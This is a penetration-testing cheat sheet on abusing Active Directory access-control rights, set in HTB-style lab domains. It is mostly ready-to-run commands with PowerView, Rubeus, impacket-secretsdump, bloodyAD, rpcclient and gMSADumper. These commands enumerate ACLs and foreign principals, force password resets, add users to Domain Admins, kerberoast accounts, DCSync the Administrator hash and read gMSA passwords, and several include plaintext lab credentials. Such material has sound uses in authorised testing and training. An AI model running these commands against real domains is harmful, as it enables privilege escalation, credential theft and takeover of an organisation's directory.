Methods
ForceChangePassword abused with Set-DomainUserPassword
AddMembers abused with Add-DomainGroupMember
GenericAll abused with Set-DomainUserPassword or Add-DomainGroupMember
GenericWrite abused with Set-DomainObject
WriteOwner abused with Set-DomainObjectOwner
WriteDACL abused with Add-DomainObjectACL
AllExtendedRights abused with Set-DomainUserPassword or Add-DomainGroupMember
ACLs enumeration
Copy #Powershell CMDLets (Manul Mode and evasive)
PS C:\\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
PS C:\\htb> foreach($line in [System.IO.File]::ReadLines("C:\\Users\\htb-student\\Desktop\\ad_users.txt")) {get-acl "AD:\\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\\\wley'}}
#Performing a Reverse Search & Mapping to a GUID Value
PS C:\\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529"
PS C:\\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl Enumerate ACLs for specific User
Copy PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $sid = Convert-NameToSid rita
PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -domain inlanefreight.ad | ? {$_.SecurityIdentifier -eq $sid} Abuse Foreign Groups
As rule try to identify users that belongs foreing groups and then check its group permission and nested groups. It may lead to lateral improvement to the parent domain
Example 1 :
User Intrusionz3r0 belongs to the foreingn group "foreingn_admins" that also belongs to accounts operator group on parent domain controller. this leads to the Intrusionz3r0 can create an user on the Parent domain and add itself to powerfull groups. (DNSAdmins)
Tools
Enumerate Foreign Users
Copy PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainForeignUser Find Foreign ACLs across all users within the domain
Copy $Domain = "domain.local"
$DomainSid = Get-DomainSid $Domain
Get-DomainObjectAcl -Domain $Domain -ResolveGUIDs -Identity * | ? {
($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') -and `
($_.AceType -match 'AccessAllowed') -and `
($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and `
($_.SecurityIdentifier -notmatch $DomainSid)
} Abusing Foreign Security Principals & ACLs
Copy #Enumerate Foreign Security Principals
PS C:\Tools> Get-DomainObject -LDAPFilter '(objectclass=ForeignSecurityPrincipal)' -Domain logistics.ad
#Enumerate Foreingth Security Principals
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainForeignGroupMember -Domain logistics.ad Convert SID to name and vice versa
Copy #Convert SID to name
PS C:\Tools> ConvertFrom-SID S-1-5-21-2432454459-173448545-3375717855-3601
#Convert name to SID
PS C:\Tools> ConvertTo-SID Intrusionz3r0 Need Credentials?
Copy $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('HTB\\svc-alfresco', $SecPassword);
GenericAll Rights on User
Copy Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
#Kerberosteable
.\\Rubeus.exe kerberoast /user:<username> /nowrap
impacket-GetUserSPNs megacorp.local/sbauer:'D3veL0pM3nT!' -request
#NotPreAuthentication
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304} GenericAll Rights on Group
Copy net group "domain admins" <username> /add /domain
Add-ADGroupMember -Identity "domain admins" -Members <username>
bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 add groupMember 'admsvc' 'Thomas.Powell' GenericWrite on Computer
shadowCredentials (windows server 2016 or later)
Resource-Based Constrained Delegation (Windows 2012 onwards)
unicodePwd to change the machine password
Copy ❯ bloodyAD -u 'FS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 set password 'ADMWS01$' 'Password123'
[+] Password changed successfully! GenericWrite on User
targetKerberoasting (the password should be weak enough to be cracked)
Copy ❯ python3 targetedKerberoast.py -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --request-user 'N.Thompson' WriteOwner Rights on User
Copy PS C:\> Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose
PS C:\> Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose
PS C:\> Set-DomainUserPassword -Identity Claire -AccountPassword (ConvertTo-SecureString 'Password1!' -AsPlainText -Force) -Verbose WriteDACL Rights on Group
Copy Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights All -Verbose
Add-ADGroupMember -Identity "Backup_Admins" -Members claire -Verbose ForceChangePassword on User
Copy Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
rpcclient -U KnownUsername 10.10.10.192
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!' [DCSync] DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on Domain Controler
Copy impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175 -just-dc-user Administrator ReadGMSAPassword
Copy bloodyAD --host 192.168.210.15 -d domain.local -u 'COMPUTERNAME$' -p :24039a7fd44d8decdxxxxxxxc06 get object 'TARGET' --attr msDS-ManagedPassword
gMSADumper.py -u 'user' -p 'password' -d 'domain.local' Refereces
